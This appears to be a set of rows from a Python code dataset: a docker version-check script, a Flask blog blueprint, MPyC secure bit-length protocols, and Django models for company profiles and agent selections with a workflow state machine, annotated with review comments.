    # Bug fix: check_output returns bytes on Python 3; re.match with a str
    # pattern against bytes raises TypeError, so decode first.
    version_string = check_output(["docker", "--version"]).decode("utf-8")
    m = re.match(pattern, version_string)
    if m is None:
        # Bug fix: previously crashed with AttributeError on m.groups()
        # when the output format was unexpected.
        print("Could not parse docker version from {!r}".format(version_string),
              file=sys.stderr)
        sys.exit(1)
    version = tuple(int(i) for i in m.groups())
    exit_if_not_within(version, (19, 3))
# Registry of available version checks; main() runs every entry whose
# function name matches the regex supplied on the command line.
checks = [
    docker
]
def main():
    """Run every check in `checks` whose name matches argv[1] (a regex)."""
    try:
        pattern = sys.argv[1]
    except IndexError:
        print("Usage: version-check.py <regex>")  # noqa
        # Bug fix: previously fell through with `pattern` unbound, raising
        # NameError on the loop below; exit with a usage error instead.
        sys.exit(1)
    for check in checks:
        if re.match(pattern, check.__name__):
            print("Checking version of {}".format(check.__name__))  # noqa
            check()


if __name__ == '__main__':
    main()
| StarcoderdataPython |
1898549 | <filename>profile/blog.py
import flask
import werkzeug.exceptions
import profile.admin
import profile.db
# Blueprint for the blog section; every route below is mounted under /blog.
bp = flask.Blueprint('blog', __name__, url_prefix='/blog')
@bp.route('/')
def index():
    """Render the blog front page listing all posts, newest first."""
    database = profile.db.get_db()
    sql = (
        'SELECT p.id, title, body, created, author_id, username'
        ' FROM post p JOIN user u ON p.author_id = u.id'
        ' ORDER BY created DESC'
    )
    rows = database.execute(sql).fetchall()
    return flask.render_template('blog/index.html', posts=rows)
@bp.route('/create', methods=('GET', 'POST'))
@profile.admin.login_required
def create():
    """View to create a post.

    GET renders the empty form; POST validates the submitted title/body
    and inserts a new row attributed to the logged-in user, then
    redirects to the index.
    """
    if flask.request.method == 'POST':
        title = flask.request.form['title']
        body = flask.request.form['body']
        error = None

        if not title:
            error = 'Title is required.'

        if error is not None:
            # Re-display the form with the validation error
            flask.flash(error)
        else:
            # Post is valid -- add to database
            db = profile.db.get_db()
            # Consistency fix: SQL keyword uppercased ('Insert' -> 'INSERT')
            # to match the style of the other queries in this module.
            query = 'INSERT INTO post (title, body, author_id) VALUES (?, ?, ?)'
            db.execute(query, (title, body, flask.g.user['id']))
            db.commit()
            return flask.redirect(flask.url_for('blog.index'))

    return flask.render_template('blog/create.html')
def get_post(post_id, check_author=True):
    """Fetch a post row by id, aborting with 404 when it does not exist.

    When check_author is True, additionally abort with 403 unless the
    current user is the post's author.
    """
    sql = (
        'SELECT p.id, title, body, created, author_id, username'
        ' FROM post p JOIN user u ON p.author_id = u.id'
        ' WHERE p.id = ?'
    )
    row = profile.db.get_db().execute(sql, (post_id,)).fetchone()

    if row is None:
        flask.abort(404, f'Post id {post_id} does not exist')
    if check_author and row['author_id'] != flask.g.user['id']:
        flask.abort(403)

    return row
@bp.route('/<int:post_id>/update', methods=('GET', 'POST'))
@profile.admin.login_required
def update(post_id):
    """Edit an existing post's title and body (author only)."""
    post = get_post(post_id)

    # GET: just show the edit form pre-filled with the current post.
    if flask.request.method != 'POST':
        return flask.render_template('blog/update.html', post=post)

    title = flask.request.form['title']
    body = flask.request.form['body']
    error = 'Title is required.' if not title else None

    if error is not None:
        flask.flash(error)
        return flask.render_template('blog/update.html', post=post)

    # Persist the edit and return to the index.
    db = profile.db.get_db()
    db.execute('UPDATE post SET title = ?, body = ? WHERE id = ?',
               (title, body, post_id))
    db.commit()
    return flask.redirect(flask.url_for('blog.index'))
@bp.route('/<int:post_id>/delete', methods=('POST',))
@profile.admin.login_required
def delete(post_id):
    """Remove a post, enforcing existence/ownership, then show the index."""
    get_post(post_id)  # aborts with 404/403 when missing or not the author
    database = profile.db.get_db()
    database.execute('DELETE from post WHERE id = ?', (post_id,))
    database.commit()
    return flask.redirect(flask.url_for('blog.index'))
| StarcoderdataPython |
3255732 | <reponame>toonsegers/sec_groups
"""Secure norm protocols by <NAME>, adapted by <NAME>.
See: https://www.researchgate.net/profile/Thijs_Veugen
"""
import itertools
from mpyc.runtime import mpc
def norm(self, x):
    """Recursive norm (adapted from mpc._norm()).

    Given secret-shared bits ``x`` (least significant bit first), securely
    computes the bit length of the represented value: 1 + index of the
    highest set bit, or 0 when all bits are zero.
    """
    def _norm(x):
        # Returns (i, nz) where nz flags "some bit of x is set" and
        # i = len(x) - bit_length(x): the distance of the top set bit
        # from the high end of this slice (= len(x) when all bits are 0).
        n = len(x)
        if n == 1:
            t = x[0]
            return 1 - t, t
        i0, nz0 = _norm(x[:n//2])  # low bits
        i1, nz1 = _norm(x[n//2:])  # high bits
        # The low half's distance must also skip over the high half,
        # which holds n - n//2 == (n+1)//2 bits.
        i0 += (((n+1)//2))
        # Prefer the high half whenever it contains a set bit.
        return self.if_else(nz1, [i1, nz1], [i0, nz0])

    l = type(x[0]).bit_length
    i, _ = _norm(x)
    return l - i  # l - (l - bit_length) == bit_length
def bit_length_mpc_norm(self, a):
    """Bit length via full bit decomposition followed by norm()."""
    bits = self.to_bits(a)  # least significant bit first
    return norm(self, bits)
def bit_length_mpc_find(self, a):
    """Bit length via bit decomposition plus find() on the reversed bits."""
    l = type(a).bit_length
    # Reverse so the most significant bit comes first; find() then locates
    # the first 1 from the top.
    bits = self.to_bits(a)[::-1]
    return l - self.find(bits, 1)
@mpc.coroutine
async def bit_length_new(self, a):
    """Secure bit length of `a` without full bit decomposition (O(l) work).

    Masks `a` with a secret random l-bit value r (plus extra randomness
    above bit l for statistical hiding), publicly opens c = a + r, and
    derives the bit length from the public bits of c combined with the
    secret bits of r, finishing with a single secure comparison.
    """
    stype = type(a)
    await self.returnType(stype)
    Zp = stype.field
    l = stype.bit_length
    # r_modl = sum_i r_bits[i] * 2^i is the secret l-bit mask.
    r_bits = await self.random_bits(Zp, l)
    r_modl = 0
    for r_i in reversed(r_bits):
        r_modl <<= 1
        r_modl += r_i.value
    # Randomness above bit l, sized by the statistical security parameter.
    r_divl = self._random(Zp, 1<<self.options.sec_param).value
    a = await self.gather(a)
    c = await self.output(a + ((1<<l) + (r_divl << l) + r_modl))
    c = c.value % (1<<l)  # public c = (a + r) mod 2^l
    c_bits = [(c >> i) & 1 for i in range(l)]
    r_bits = [stype(r.value) for r in r_bits]
    # d_bits[i] = c_i XOR r_i (public bit c_i, secret bit r_i).
    d_bits = [1-r_bits[i] if c_bits[i] else r_bits[i] for i in range(l)]
    # For every position i with c_i = 0, multiply d_bits[i+1] by (1 - r_i),
    # batched into one secure element-wise product.
    h_bits = mpc.schur_prod([1-r_bits[i] for i in range(l-1) if not c_bits[i]],
                            [d_bits[i+1] for i in range(l-1) if not c_bits[i]])
    for i in range(l-2, -1, -1):
        if not c_bits[i]:
            d_bits[i+1] = h_bits.pop()
    # norm() returns the bit length of the d vector; k is the candidate
    # index of a's top bit, corrected below by one secure comparison.
    k = norm(self, d_bits) - 1
    k_u = self.unit_vector(k, l)  # 0<=k<l assumed
    # Recover k and 2^k from the secret unit vector via inner products.
    k = mpc.in_prod(k_u, list(map(stype, range(l+1))))
    k2 = mpc.in_prod(k_u, list(map(stype, list(map(lambda a: 2**a, range(l+1))))))
    return k - (a < k2) + 1  # position + 1 is bit length
@mpc.coroutine
async def bit_length_integrated(self, a):
    """Secure bit length of `a`, with the final comparison integrated.

    Same masked-opening approach as bit_length_new(), but instead of a
    separate secure `<` at the end, the correction bit is computed inline
    from the bits of c and (adjusted) r via a product-of-terms gadget.
    """
    stype = type(a)
    await self.returnType(stype)
    Zp = stype.field
    l = stype.bit_length
    r_bits = await self.random_bits(Zp, l)
    r_modl = 0
    for r_i in reversed(r_bits):  # assemble secret mask r from its bits
        r_modl <<= 1
        r_modl += r_i.value
    # Statistical blinding above bit l.
    r_divl = self._random(Zp, 1<<self.options.sec_param).value
    a = await self.gather(a)
    c = await self.output(a + ((1<<l) + (r_divl << l) + r_modl))
    c = c.value % (1<<l)  # public c = (a + r) mod 2^l
    c_bits = [(c >> i) & 1 for i in range(l)]
    # d_bits[i] = c_i XOR r_i, as secure numbers.
    d_bits = [stype((1 - r_bits[i] if c_bits[i] else r_bits[i]).value) for i in range(l)]
    # Where c_i = 0, multiply d_bits[i+1] by (1 - r_i), in one batch.
    h_bits = mpc.schur_prod([stype(1 - r_bits[i]) for i in range(l-1) if not c_bits[i]],
                            [d_bits[i+1] for i in range(l-1) if not c_bits[i]])
    for i in range(l-2, -1, -1):
        if not c_bits[i]:
            d_bits[i+1] = h_bits.pop()
    k = norm(self, d_bits) - 1  # candidate index of a's top bit
    k_u = self.unit_vector(k, l)  # 0<=k<l assumed
    k_u = await mpc.gather(k_u)
    # Prefix sums of the unit vector flag all positions >= k; use them to
    # overwrite r's high bits with c's bits at those positions.
    psums = list(itertools.accumulate(k_u))
    pp = await mpc.schur_prod(psums, [c_bits[i] - r_bits[i] for i in range(l)])
    for i in range(l):
        r_bits[i] += pp[i]
    # Comparison gadget with a random sign s_sign: the product of the e[i]
    # is zero iff the comparison outcome matches the chosen sign
    # (standard masked bitwise-comparison technique -- see refs).
    s_sign = (await self.random_bits(Zp, 1, signed=True))[0].value
    e = [None] * (l+1)
    sumXors = 0
    for i in range(l-1, -1, -1):
        c_i = c_bits[i]
        r_i = r_bits[i].value
        e[i] = Zp(s_sign + r_i - c_i + 3*sumXors)
        sumXors += 1 - r_i if c_i else r_i
    e[l] = Zp(s_sign - 1 + 3*sumXors)
    # A public zero-test of the (blinded) product leaks only the masked bit.
    g = await self.is_zero_public(stype(self.prod(e)))
    z = Zp(1 - s_sign if g else 1 + s_sign)/2  # unmask the correction bit
    return k - z + 1  # position + 1 is bit length
async def test(text, bit_length):
    """Exhaustively check a secure bit_length protocol against int.bit_length.

    NOTE(review): relies on the module-level `secint` type whose definition
    is commented out at the bottom of this file -- uncomment it (and the
    corresponding mpc.run lines) before running.
    """
    print(f'Secure bit length: using {text}.')
    async with mpc:
        for i in range(1, 128):  # TODO: case i=0, case i<0
            a = i
            n = await mpc.output(bit_length(mpc, secint(a)))
            print(f'{round(100*i/127)}%', end='\r')
            assert a.bit_length() == n, (a.bit_length(), n, i)
# secint = mpc.SecInt()
# print(f'Using secure {secint.bit_length}-bit integers: {secint.__name__}')
# mpc.run(test('MPyC bit decomposition (norm)', bit_length_mpc_norm))
# mpc.run(test('MPyC bit decomposition (find)', bit_length_mpc_find))
# mpc.run(test('new O(m) approach', bit_length_new))
# mpc.run(test('integrated O(m) approach', bit_length_integrated))
| StarcoderdataPython |
6505394 | # -*- coding: utf-8 -*-
from django.db import models
from config.common import Common
from django.utils.translation import ugettext_lazy as _
from agent.models import Agent
from django_fsm import FSMKeyField, transition
import datetime
from django.db.models.signals import post_save
from django.utils.formats import date_format
from django.core.validators import RegexValidator
class Company(models.Model):
    """Company profile attached to a user account (French business fields)."""
    user = models.ForeignKey(Common.AUTH_USER_MODEL, related_name='company')
    name = models.CharField(_(u'Nom'), max_length=256, null=True)
    phonenumber = models.CharField(
        _(u'Téléphone fixe'), max_length=10, null=True)
    faxnumber = models.CharField(
        _(u'Numéro de fax'), max_length=10, blank=True, null=True)
    # French business identifiers: APE activity code and SIRET registration.
    ape = models.CharField(_(u'Code APE'), max_length=256, blank=True, null=True)
    siret = models.CharField(_(u'Code SIRET'), max_length=256, blank=True, null=True)
    # NOTE(review): the regex enforces exactly 11 characters; a full French
    # intra-community VAT number is "FR" + 11 characters -- confirm whether
    # the country prefix is intentionally stored elsewhere.
    vat_number = models.CharField(_('Numero de TVA'), validators=[RegexValidator(regex='^.{11}$', message='Exactement 11 caracteres', code='nomatch')], max_length=11, blank=True, null=True)
    address1 = models.CharField(_('Adresse 1'), max_length=120)
    address2 = models.CharField(_('Adresse 2'), max_length=120, blank=True, null=True)
    zipcode = models.CharField(_('Code Postal'), max_length=5, blank=True)
    city = models.CharField(_('Ville'), max_length=120, blank=True)
    created = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated = models.DateTimeField(auto_now=True)      # refreshed on every save

    def __unicode__(self):
        # Python 2 string representation (this codebase predates __str__ use).
        return self.name
class States(models.Model):
    """Lookup table of workflow states referenced by Selection.state (FSMKeyField)."""
    id = models.CharField(primary_key=True, max_length=50)  # state key, e.g. 'new'
    label = models.CharField(max_length=255)  # human-readable state name

    def __unicode__(self):
        return self.label
from django.middleware import csrf


def get_or_create_csrf_token(request):
    """Return the request's CSRF token, generating and attaching one if absent."""
    token = request.META.get('CSRF_COOKIE', None)
    if token is None:
        # NOTE(review): csrf._get_new_csrf_key is a private Django API that
        # was renamed/removed in later Django releases -- confirm against the
        # project's pinned Django version.
        token = csrf._get_new_csrf_key()
        request.META['CSRF_COOKIE'] = token
    # Mark the token as used so Django sends the cookie with the response.
    request.META['CSRF_COOKIE_USED'] = True
    return token
class SelectionQuerySet(models.QuerySet):
    """Custom queryset providing per-user filtering for Selection."""

    def for_user(self, user):
        """Return only the selections belonging to *user*.

        Bug fixes: removed a leftover debug ``print`` that ran on every
        call, and corrected the filter field -- Selection has no ``client``
        field; its user foreign key is ``owner`` (see the Selection model).
        """
        return self.filter(owner=user)
class Selection(models.Model):
    """A client's selection of agents, moving through a django_fsm workflow:
    new -> validated -> payed -> pdf_generated -> exported.
    """
    owner = models.ForeignKey(Common.AUTH_USER_MODEL, related_name='selection')
    created = models.DateTimeField(auto_now_add=True)
    updated = models.DateTimeField(auto_now=True)
    # Workflow state, keyed into the States table; protected=True forbids
    # direct assignment (only the @transition methods below may change it).
    state = FSMKeyField(States, default='new', protected=True, blank=True, null=True, related_name='selection_state')
    name = models.CharField(_('Nom'), max_length=120, blank=True, null=True)
    description = models.CharField(_('Description'), max_length=220, blank=True, null=True)
    # NOTE(review): null=True has no effect on a ManyToManyField (Django warns).
    agents = models.ManyToManyField(Agent, blank=True,
                                    null=True,
                                    through='SelectionAgentsRelationship',
                                    related_name='agents')

    def save(self, *args, **kwargs):
        # NOTE(review): last_modified is not a declared model field, so this
        # attribute is never persisted; the `updated` field (auto_now) already
        # tracks modification time -- confirm whether this line can go.
        self.last_modified = datetime.datetime.today()
        return super(Selection, self).save(*args, **kwargs)

    @transition(field=state, source='new', target='validated')
    def validate(self):
        # NOTE(review): leftover debug print (and the message says "created"
        # while the target state is 'validated').
        print "Selection state update to created"
        pass

    @transition(field=state, source='validated', target='payed')
    def payed(self):
        pass

    @transition(field=state, source='payed', target='pdf_generated')
    def generate_pdf(self):
        pass

    @transition(field=state, source='pdf_generated', target='exported')
    def export(self):
        pass

    @property
    def get_created_date_formated(self):
        # Locale-aware short date for display in lists.
        return date_format(self.created, "SHORT_DATE_FORMAT")

    @property
    def get_updated_date_formated(self):
        return date_format(self.updated, "SHORT_DATETIME_FORMAT")

    def add_action_button(self, **kwargs):
        # NOTE(review): 'created' is not among the FSM states declared above
        # (new/validated/payed/pdf_generated/exported), so this branch looks
        # unreachable and every row would render as "bloque" -- confirm intent.
        if self.state == 'created':
            return """<a class='btn' href="/client/~client/data?selectionid=%s">""" % (self.id)
        else:
            return """bloque"""

    objects = SelectionQuerySet.as_manager()
# NOTE(review): this connects the bound validate() of one throwaway Selection
# instance (created at import time) as the post_save handler for ALL Selection
# saves. Django passes signal kwargs (sender, instance, created, ...) that
# validate() does not accept, and the handler would act on the module-level
# instance rather than the saved row -- confirm intent; the usual pattern is a
# module-level function taking (sender, instance, **kwargs).
post_save.connect(Selection().validate, Selection, dispatch_uid="Selection_validated")
class SelectionAgentsRelationship(models.Model):
    """Explicit through model linking a Selection to its Agents."""
    agent = models.ForeignKey(Agent, blank=True, null=True)
    selection = models.ForeignKey(Selection, blank=True, null=True)

    def __unicode__(self):
        return unicode(self.selection)

    class Meta():
        # NOTE(review): auto_created = True on an explicit through model is a
        # known hack to make Django treat the table like an auto-generated M2M
        # join (so .add()/.remove() work); it interferes with migrations --
        # confirm this is intentional.
        auto_created = True
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.